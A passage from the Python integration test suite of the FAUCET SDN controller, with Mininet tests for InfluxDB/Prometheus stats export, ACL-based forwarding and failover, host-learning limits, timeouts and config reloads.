""" % FaucetUntaggedTest.DB_TIMEOUT
config_ports = {'gauge_influx_port': None}
influx_log = None
server_thread = None
server = None
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 2
db: 'influx'
port_state:
dps: ['%s']
type: 'port_state'
interval: 2
db: 'influx'
flow_table:
dps: ['%s']
type: 'flow_table'
interval: 2
db: 'influx'
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)
def setup_influx(self):
self.influx_log = os.path.join(self.tmpdir, 'influx.log')
if self.server:
self.server.influx_log = self.influx_log
self.server.timeout = self.DB_TIMEOUT
def setUp(self):
self.handler = InfluxPostHandler
super().setUp()
self.setup_influx()
def tearDown(self, ignore_oferrors=False):
if self.server:
self.server.shutdown()
self.server.socket.close()
super().tearDown(ignore_oferrors=ignore_oferrors)
def _wait_error_shipping(self, timeout=None):
if timeout is None:
timeout = self.DB_TIMEOUT * 3 * 2
self.wait_until_matching_lines_from_gauge_log_files(
r'.+error shipping.+', timeout=timeout)
def _verify_influx_log(self, retries=3):
self.assertTrue(os.path.exists(self.influx_log))
expected_vars = {
'dropped_in', 'dropped_out', 'bytes_out', 'flow_packet_count',
'errors_in', 'errors_out', 'bytes_in', 'flow_byte_count',
'port_state_reason', 'packets_in', 'packets_out'}
observed_vars = set()
for _ in range(retries):
with open(self.influx_log, encoding='utf-8') as influx_log:
influx_log_lines = influx_log.readlines()
for point_line in influx_log_lines:
point_fields = point_line.strip().split()
self.assertEqual(3, len(point_fields), msg=point_fields)
ts_name, value_field, _ = point_fields
value = float(value_field.split('=')[1])
ts_name_fields = ts_name.split(',')
self.assertGreater(len(ts_name_fields), 1)
observed_vars.add(ts_name_fields[0])
label_values = {}
for label_value in ts_name_fields[1:]:
label, value = label_value.split('=')
label_values[label] = value
if ts_name.startswith('flow'):
self.assertTrue('inst_count' in label_values, msg=point_line)
if 'vlan_vid' in label_values:
self.assertEqual(
int(label_values['vlan']), int(value) ^ 0x1000)
if expected_vars == observed_vars:
break
time.sleep(1)
self.assertEqual(expected_vars, observed_vars)
self.verify_no_exception(self.env[self.gauge_controller.name]['GAUGE_EXCEPTION_LOG'])
def _wait_influx_log(self):
for _ in range(self.DB_TIMEOUT * 3):
if os.path.exists(self.influx_log):
return
time.sleep(1)
def _start_gauge_check(self):
if self.server_thread:
return None
influx_port = self.config_ports['gauge_influx_port']
try:
self.server = QuietHTTPServer(
(mininet_test_util.LOCALHOST, influx_port),
self.handler) # pytype: disable=attribute-error
self.server.timeout = self.DB_TIMEOUT
self.server_thread = threading.Thread(
target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
return None
except socket.error as err:
return 'cannot start Influx test server: %s' % err
def test_untagged(self):
self.ping_all_when_learned()
self.hup_controller(self.gauge_controller.name)
self.flap_all_switch_ports()
self._wait_influx_log()
self._verify_influx_log()
class FaucetUntaggedMultiDBWatcherTest(
FaucetUntaggedInfluxTest, FaucetUntaggedPrometheusGaugeTest):
GAUGE_CONFIG_DBS = """
prometheus:
type: 'prometheus'
prometheus_addr: '::1'
prometheus_port: %(gauge_prom_port)d
influx:
type: 'influx'
influx_db: 'faucet'
influx_host: '127.0.0.1'
influx_port: %(gauge_influx_port)d
influx_user: 'faucet'
influx_pwd: ''
influx_retries: 1
""" + """
influx_timeout: %u
""" % FaucetUntaggedTest.DB_TIMEOUT
config_ports = {
'gauge_prom_port': None,
'gauge_influx_port': None}
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 5
dbs: ['prometheus', 'influx']
port_state:
dps: ['%s']
type: 'port_state'
interval: 5
dbs: ['prometheus', 'influx']
flow_table:
dps: ['%s']
type: 'flow_table'
interval: 5
dbs: ['prometheus', 'influx']
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)
@staticmethod
def test_tagged():
return
def test_untagged(self):
self.wait_dp_status(1, controller=self.gauge_controller.name)
self.assertTrue(self.wait_ports_updating(self.port_map.keys(), self.PORT_VARS))
self.ping_all_when_learned()
self.hup_controller(controller=self.gauge_controller.name)
self.flap_all_switch_ports()
self._wait_influx_log()
self._verify_influx_log()
class FaucetUntaggedInfluxDownTest(FaucetUntaggedInfluxTest):
def _start_gauge_check(self):
return None
def test_untagged(self):
self.ping_all_when_learned()
self._wait_error_shipping()
self.verify_no_exception(self.env[self.gauge_controller.name]['GAUGE_EXCEPTION_LOG'])
class FaucetUntaggedInfluxUnreachableTest(FaucetUntaggedInfluxTest):
GAUGE_CONFIG_DBS = """
influx:
type: 'influx'
influx_db: 'faucet'
influx_host: '127.0.0.2'
influx_port: %(gauge_influx_port)d
influx_user: 'faucet'
influx_pwd: ''
influx_timeout: 2
"""
def _start_gauge_check(self):
return None
def test_untagged(self):
self.gauge_controller.cmd(
'route add 127.0.0.2 gw 127.0.0.1 lo')
self.ping_all_when_learned()
self._wait_error_shipping()
self.verify_no_exception(self.env[self.gauge_controller.name]['GAUGE_EXCEPTION_LOG'])
class FaucetSingleUntaggedInfluxTooSlowTest(FaucetUntaggedInfluxTest):
def setUp(self):
self.handler = SlowInfluxPostHandler
super().setUp()
self.setup_influx()
def test_untagged(self):
self.ping_all_when_learned()
self._wait_influx_log()
self.assertTrue(os.path.exists(self.influx_log))
self._wait_error_shipping()
self.verify_no_exception(self.env[self.gauge_controller.name]['GAUGE_EXCEPTION_LOG'])
class FaucetNailedForwardingTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
port: %(port_2)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
port: %(port_2)d
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 2
%(port_3)d:
native_vlan: 100
acl_in: 3
%(port_4)d:
native_vlan: 100
acl_in: 4
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
class FaucetNailedForwardingOrderedTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
- port: %(port_2)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
- port: %(port_2)d
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
- port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
- port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 2
%(port_3)d:
native_vlan: 100
acl_in: 3
%(port_4)d:
native_vlan: 100
acl_in: 4
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
class FaucetNailedFailoverForwardingTest(FaucetNailedForwardingTest):
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
failover:
group_id: 1001
ports: [%(port_2)d, %(port_3)d]
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
failover:
group_id: 1002
ports: [%(port_2)d, %(port_3)d]
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
port: %(port_1)d
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
def test_untagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[0:3]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
third_host.setMAC('0e:00:00:00:02:02')
third_host.setIP(second_host.IP())
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
self.set_port_down(self.port_map['port_2'])
self.one_ipv4_ping(
first_host, third_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
third_host, first_host.IP(), require_host_learned=False)
class FaucetNailedFailoverForwardingOrderedTest(FaucetNailedForwardingTest):
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
- failover:
group_id: 1001
ports: [%(port_2)d, %(port_3)d]
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
- failover:
group_id: 1002
ports: [%(port_2)d, %(port_3)d]
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
- port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
- port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
- port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
- port: %(port_1)d
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
def test_untagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[0:3]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
third_host.setMAC('0e:00:00:00:02:02')
third_host.setIP(second_host.IP())
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
self.set_port_down(self.port_map['port_2'])
self.one_ipv4_ping(
first_host, third_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
third_host, first_host.IP(), require_host_learned=False)
class FaucetUntaggedLLDPBlockedTest(FaucetUntaggedTest):
def test_untagged(self):
self.ping_all_when_learned()
self.verify_lldp_blocked()
# Verify 802.1x flood block triggered.
self.wait_nonzero_packet_count_flow(
{'dl_dst': '01:80:c2:00:00:00/ff:ff:ff:ff:ff:f0'},
table_id=self._FLOOD_TABLE)
class FaucetUntaggedCDPTest(FaucetUntaggedTest):
def test_untagged(self):
self.ping_all_when_learned()
self.verify_cdp_blocked()
class FaucetTaggedAndUntaggedSameVlanTest(FaucetTest):
"""Test mixture of tagged and untagged hosts on the same VLAN."""
N_TAGGED = 1
N_UNTAGGED = 3
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "mixed"
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=1, n_untagged=3, links_per_host=self.LINKS_PER_HOST,
hw_dpid=self.hw_dpid)
self.start_net()
def test_untagged(self):
"""Test connectivity including after port flapping."""
self.ping_all_when_learned()
self.flap_all_switch_ports()
self.ping_all_when_learned()
self.verify_broadcast()
self.verify_no_bcast_to_self()
class FaucetTaggedAndUntaggedSameVlanEgressTest(FaucetTaggedAndUntaggedSameVlanTest):
REQUIRES_METADATA = True
CONFIG = """
egress_pipeline: True
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetTaggedAndUntaggedSameVlanGroupTest(FaucetTaggedAndUntaggedSameVlanTest):
CONFIG = """
group_table: True
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetUntaggedMaxHostsTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
max_hosts: 2
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_untagged(self):
self.ping_all()
learned_hosts = [
host for host in self.hosts_name_ordered() if self.host_learned(host)]
self.assertEqual(2, len(learned_hosts))
self.assertEqual(2, self.scrape_prometheus_var(
'vlan_hosts_learned', {'vlan': '100'}))
self.assertGreater(
self.scrape_prometheus_var(
'vlan_learn_bans', {'vlan': '100'}), 0)
class FaucetMaxHostsPortTest(FaucetUntaggedTest):
MAX_HOSTS = 3
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
max_hosts: 3
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.ping_all_when_learned()
for i in range(10, 10 + (self.MAX_HOSTS * 2)):
mac_intf = 'mac%u' % i
mac_ipv4 = '10.0.0.%u' % i
self.add_macvlan(second_host, mac_intf, ipa=mac_ipv4)
ping_cmd = mininet_test_util.timeout_cmd(
'fping %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
self.FPING_ARGS_SHORT, mac_intf, first_host.IP()),
2)
second_host.cmd(ping_cmd)
flows = self.get_matching_flows_on_dpid(
self.dpid,
{'dl_vlan': '100', 'in_port': int(self.port_map['port_2'])},
table_id=self._ETH_SRC_TABLE)
self.assertEqual(self.MAX_HOSTS, len(flows))
port_labels = self.port_labels(self.port_map['port_2'])
self.assertGreater(
self.scrape_prometheus_var(
'port_learn_bans', port_labels), 0)
learned_macs = [
mac for _, mac in self.scrape_prometheus_var(
'learned_macs', dict(port_labels, vlan=100),
multiple=True) if mac]
self.assertEqual(self.MAX_HOSTS, len(learned_macs))
class FaucetSingleHostsTimeoutPrometheusTest(FaucetUntaggedTest):
"""Test that hosts learned and reported in Prometheus, time out."""
TIMEOUT = 15
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
timeout: 25
arp_neighbor_timeout: 12
nd_neighbor_timeout: 12
ignore_learn_ins: 0
learn_jitter: 0
cache_update_guard_time: 1
""" + CONFIG_BOILER_UNTAGGED
def hosts_learned(self, hosts):
"""Check that hosts are learned by FAUCET on the expected ports."""
macs_learned = []
for mac, port in hosts.items():
if self.prom_mac_learned(mac, port=port):
self.mac_learned(mac, in_port=port)
macs_learned.append(mac)
return macs_learned
def verify_hosts_learned(self, first_host, second_host, mac_ips, hosts):
mac_ipv4s = [mac_ipv4 for mac_ipv4, _ in mac_ips]
fping_cmd = mininet_test_util.timeout_cmd(
'fping %s -c%u %s' % (
self.FPING_ARGS_SHORT, int(self.TIMEOUT / 3), ' '.join(mac_ipv4s)),
self.TIMEOUT / 2)
for _ in range(3):
fping_out = first_host.cmd(fping_cmd)
self.assertTrue(fping_out, msg='fping did not complete: %s' % fping_cmd)
macs_learned = self.hosts_learned(hosts)
if len(macs_learned) == len(hosts):
return
time.sleep(1)
first_host_diag = first_host.cmd('ifconfig -a ; arp -an')
second_host_diag = second_host.cmd('ifconfig -a ; arp -an')
self.fail('%s cannot be learned (%s != %s)\nfirst host %s\nsecond host %s\n' % (
mac_ips, macs_learned, fping_out, first_host_diag, second_host_diag))
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
all_learned_mac_ports = {}
# learn batches of hosts, then down them
for base in (10, 20, 30):
def add_macvlans(base, count):
mac_intfs = []
mac_ips = []
learned_mac_ports = {}
for i in range(base, base + count):
mac_intf = 'mac%u' % i
mac_intfs.append(mac_intf)
mac_ipv4 = '10.0.0.%u' % i
self.add_macvlan(second_host, mac_intf, ipa=mac_ipv4)
macvlan_mac = self.get_mac_of_intf(mac_intf, second_host)
learned_mac_ports[macvlan_mac] = self.port_map['port_2']
mac_ips.append((mac_ipv4, macvlan_mac))
return (mac_intfs, mac_ips, learned_mac_ports)
def down_macvlans(macvlans):
for macvlan in macvlans:
second_host.cmd('ip link set dev %s down' % macvlan)
def learn_then_down_hosts(base, count):
mac_intfs, mac_ips, learned_mac_ports = add_macvlans(base, count)
self.verify_hosts_learned(first_host, second_host, mac_ips, learned_mac_ports)
down_macvlans(mac_intfs)
return learned_mac_ports
learned_mac_ports = learn_then_down_hosts(base, 5)
all_learned_mac_ports.update(learned_mac_ports)
# make sure at least one host still learned
learned_macs = self.hosts_learned(all_learned_mac_ports)
self.assertTrue(learned_macs)
before_expiry_learned_macs = learned_macs
# make sure they all eventually expire
for _ in range(self.TIMEOUT * 3):
learned_macs = self.hosts_learned(all_learned_mac_ports)
self.verify_learn_counters(
100, list(range(1, len(self.hosts_name_ordered()) + 1)))
if not learned_macs:
break
time.sleep(1)
self.assertFalse(learned_macs, msg='MACs did not expire: %s' % learned_macs)
self.assertTrue(before_expiry_learned_macs)
for mac in before_expiry_learned_macs:
self.wait_until_no_matching_flow({'eth_dst': mac}, table_id=self._ETH_DST_TABLE)
class FaucetSingleHostsNoIdleTimeoutPrometheusTest(FaucetSingleHostsTimeoutPrometheusTest):
"""Test broken reset idle timer on flow refresh workaround."""
CONFIG = """
timeout: 15
arp_neighbor_timeout: 4
nd_neighbor_timeout: 4
ignore_learn_ins: 0
learn_jitter: 0
cache_update_guard_time: 1
idle_dst: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetSingleL3LearnMACsOnPortTest(FaucetUntaggedTest):
# TODO: currently set to accommodate least hardware
def _max_hosts(): # pylint: disable=no-method-argument,no-self-use
return 512
MAX_HOSTS = _max_hosts()
TEST_IPV4_NET = '10.0.0.0'
TEST_IPV4_PREFIX = 16 # must hold more than MAX_HOSTS + 4
LEARN_IPV4 = '10.0.254.254'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
max_hosts: %u
faucet_vips: ["10.0.254.254/16"]
""" % (_max_hosts() + 4)
CONFIG = ("""
ignore_learn_ins: 0
metrics_rate_limit_sec: 3
table_sizes:
eth_src: %u
eth_dst: %u
ipv4_fib: %u
""" % (_max_hosts() + 64, _max_hosts() + 64, _max_hosts() + 64) + """
interfaces:
%(port_1)d:
native_vlan: 100
max_hosts: 4096
%(port_2)d:
native_vlan: 100
max_hosts: 4096
%(port_3)d:
native_vlan: 100
max_hosts: 4096
%(port_4)d:
native_vlan: 100
max_hosts: 4096
""")
def test_untagged(self):
test_net = ipaddress.IPv4Network(
'%s/%s' % (self.TEST_IPV4_NET, self.TEST_IPV4_PREFIX))
learn_ip = ipaddress.IPv4Address(self.LEARN_IPV4)
self.verify_learning(test_net, learn_ip, 64, self.MAX_HOSTS)
class FaucetSingleL2LearnMACsOnPortTest(FaucetUntaggedTest):
# TODO: currently set to accommodate least hardware
def _max_hosts(): # pylint: disable=no-method-argument,no-self-use
return 1024
MAX_HOSTS = _max_hosts()
TEST_IPV4_NET = '10.0.0.0'
TEST_IPV4_PREFIX = 16 # must hold more than MAX_HOSTS + 4
LEARN_IPV4 = '10.0.0.1'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
max_hosts: %u
""" % (_max_hosts() + 4)
CONFIG = ("""
ignore_learn_ins: 0
metrics_rate_limit_sec: 3
table_sizes:
eth_src: %u
eth_dst: %u
""" % (_max_hosts() + 64, _max_hosts() + 64) + """
interfaces:
%(port_1)d:
native_vlan: 100
max_hosts: 4096
%(port_2)d:
native_vlan: 100
max_hosts: 4096
%(port_3)d:
native_vlan: 100
max_hosts: 4096
%(port_4)d:
native_vlan: 100
max_hosts: 4096
""")
def test_untagged(self):
test_net = ipaddress.IPv4Network(
'%s/%s' % (self.TEST_IPV4_NET, self.TEST_IPV4_PREFIX))
learn_ip = ipaddress.IPv4Address(self.LEARN_IPV4)
self.verify_learning(test_net, learn_ip, 64, self.MAX_HOSTS)
class FaucetUntaggedHUPTest(FaucetUntaggedTest):
"""Test handling HUP signal without config change."""
def _configure_count_with_retry(self, expected_count):
expected = [expected_count for _ in range(self.NUM_FAUCET_CONTROLLERS)]
counts = []
for _ in range(3):
counts = []
for controller in self.faucet_controllers:
count = self.get_configure_count(controller=controller.name)
counts.append(count)
if counts == expected:
break
time.sleep(1)
self.assertEqual(
counts, expected,
'Controller configure counts %s != expected counts %s' % (counts, expected))
def test_untagged(self):
"""Test that FAUCET receives HUP signal and keeps switching."""
init_config_count = self.get_configure_count()
reload_type_vars = (
'faucet_config_reload_cold',
'faucet_config_reload_warm')
reload_vals = {}
for var in reload_type_vars:
reload_vals[var] = self.scrape_prometheus_var(
var, dpid=True, default=None)
for i in range(init_config_count, init_config_count + 3):
self._configure_count_with_retry(i)
with open(self.faucet_config_path, 'a', encoding='utf-8') as config_file:
config_file.write('\n')
self.verify_faucet_reconf(change_expected=False)
self._configure_count_with_retry(i + 1)
self.assertEqual(
self.scrape_prometheus_var(
'of_dp_disconnections_total', dpid=True, default=None),
0)
self.assertEqual(
self.scrape_prometheus_var(
'of_dp_connections_total', dpid=True, default=None),
1)
self.wait_until_controller_flow()
self.ping_all_when_learned()
for var in reload_type_vars:
self.assertEqual(
reload_vals[var],
self.scrape_prometheus_var(var, dpid=True, default=None))
class FaucetChangeVlanACLTest(FaucetTest):
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls_in: [1]
"""
START_ACL_CONFIG = """
acls:
1:
rules:
- rule:
eth_type: 0x800
actions: {allow: 1}
- rule:
actions: {allow: 1}
"""
UPDATE_ACL_CONFIG = """
acls:
1:
rules:
- rule:
eth_type: 0x806
actions: {allow: 1}
- rule:
eth_type: 0x800
actions: {allow: 1}
- rule:
actions: {allow: 1}
"""
# pylint: disable=invalid-name
CONFIG = CONFIG_BOILER_UNTAGGED
def setUp(self):
super().setUp()
self.acl_config_file = os.path.join(self.tmpdir, 'acl.txt')
self.CONFIG = '\n'.join(
(self.CONFIG, 'include:\n - %s' % self.acl_config_file))
with open(self.acl_config_file, 'w', encoding='utf-8') as acf:
acf.write(self.START_ACL_CONFIG)
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
def test_vlan_acl_update(self):
self.ping_all_when_learned()
new_yaml_acl_conf = yaml_load(self.UPDATE_ACL_CONFIG)
self.reload_conf(
new_yaml_acl_conf, self.acl_config_file, # pytype: disable=attribute-error
restart=True, cold_start=True)
self.wait_until_matching_flow(
{'dl_type': 0x800}, table_id=self._VLAN_ACL_TABLE)
self.wait_until_matching_flow(
{'dl_type': 0x806}, table_id=self._VLAN_ACL_TABLE)
self.ping_all_when_learned()
orig_yaml_acl_conf = yaml_load(self.START_ACL_CONFIG)
self.reload_conf(
orig_yaml_acl_conf, self.acl_config_file, # pytype: disable=attribute-error
restart=True, cold_start=True)
self.wait_until_matching_flow(
{'dl_type': 0x800}, table_id=self._VLAN_ACL_TABLE)
self.wait_until_no_matching_flow(
{'dl_type': 0x806}, table_id=self._VLAN_ACL_TABLE)
self.ping_all_when_learned()
class FaucetIPv4TupleTest(FaucetTest):
MAX_RULES = 1024
ETH_TYPE = IPV4_ETH
NET_BASE = ipaddress.IPv4Network('10.0.0.0/16')
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
table_sizes:
port_acl: 1100
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
"""
START_ACL_CONFIG = """
acls:
1:
exact_match: True
rules:
- rule:
actions: {allow: 1}
eth_type: 2048
ip_proto: 6
ipv4_dst: 127.0.0.1
ipv4_src: 127.0.0.1
tcp_dst: 65535
tcp_src: 65535
"""
def setUp(self):
super().setUp()
self.acl_config_file = os.path.join(self.tmpdir, 'acl.txt')
self.CONFIG = '\n'.join(
(self.CONFIG, 'include:\n - %s' % self.acl_config_file))
with open(self.acl_config_file, 'w', encoding='utf-8') as acf:
acf.write(self.START_ACL_CONFIG)
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
def _push_tuples(self, eth_type, host_ips):
max_rules = len(host_ips)
rules = 1
while rules <= max_rules:
rules_yaml = []
for rule in range(rules):
host_ip = host_ips[rule]
port = (rule + 1) % 2**16
ip_match = str(host_ip)
rule_yaml = {
'eth_type': eth_type,
'ip_proto': 6,
'tcp_src': port,
'tcp_dst': port,
'ipv%u_src' % host_ip.version: ip_match,
'ipv%u_dst' % host_ip.version: ip_match,
'actions': {'allow': 1},
}
rules_yaml.append({'rule': rule_yaml})
yaml_acl_conf = {'acls': {1: {'exact_match': True, 'rules': rules_yaml}}}
tuple_txt = '%u IPv%u tuples\n' % (len(rules_yaml), host_ip.version)
error('pushing %s' % tuple_txt)
self.reload_conf(
yaml_acl_conf, self.acl_config_file, # pytype: disable=attribute-error
restart=True, cold_start=False)
error('pushed %s' % tuple_txt)
self.wait_until_matching_flow(
{'tp_src': port, 'ip_proto': 6, 'dl_type': eth_type}, table_id=0)
rules *= 2
def test_tuples(self):
host_ips = list(itertools.islice(self.NET_BASE.hosts(), self.MAX_RULES))
self._push_tuples(self.ETH_TYPE, host_ips)
class FaucetIPv6TupleTest(FaucetIPv4TupleTest):
MAX_RULES = 1024
ETH_TYPE = IPV6_ETH
NET_BASE = ipaddress.IPv6Network('fc00::00/64')
START_ACL_CONFIG = """
acls:
1:
exact_match: True
rules:
- rule:
actions: {allow: 1}
eth_type: 34525
ip_proto: 6
ipv6_dst: ::1
ipv6_src: ::1
tcp_dst: 65535
tcp_src: 65535
"""
class FaucetConfigReloadTestBase(FaucetTest):
"""Test handling HUP signal with config change."""
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
200:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: allow
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
tagged_vlans: [200]
"""
ACL = """
acls:
1:
- rule:
description: "rule 1"
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
cookie: COOKIE
actions:
allow: 1
2:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 1
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 0
- rule:
cookie: COOKIE
actions:
allow: 1
3:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5003
actions:
allow: 0
4:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
deny:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 65535
actions:
allow: 0
- rule:
cookie: COOKIE
actions:
allow: 0
allow:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 65535
actions:
allow: 1
- rule:
cookie: COOKIE
actions:
allow: 1
"""
ACL_COOKIE = None
def setUp(self):
super().setUp()
self.ACL_COOKIE = random.randint(1, 2**16 - 1)
self.ACL = self.ACL.replace('COOKIE', str(self.ACL_COOKIE))
self.acl_config_file = '%s/acl.yaml' % self.tmpdir
with open(self.acl_config_file, 'w', encoding='utf-8') as config_file:
config_file.write(self.ACL)
self.CONFIG = '\n'.join(
(self.CONFIG, 'include:\n - %s' % self.acl_config_file))
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
class FaucetDelPortTest(FaucetConfigReloadTestBase):
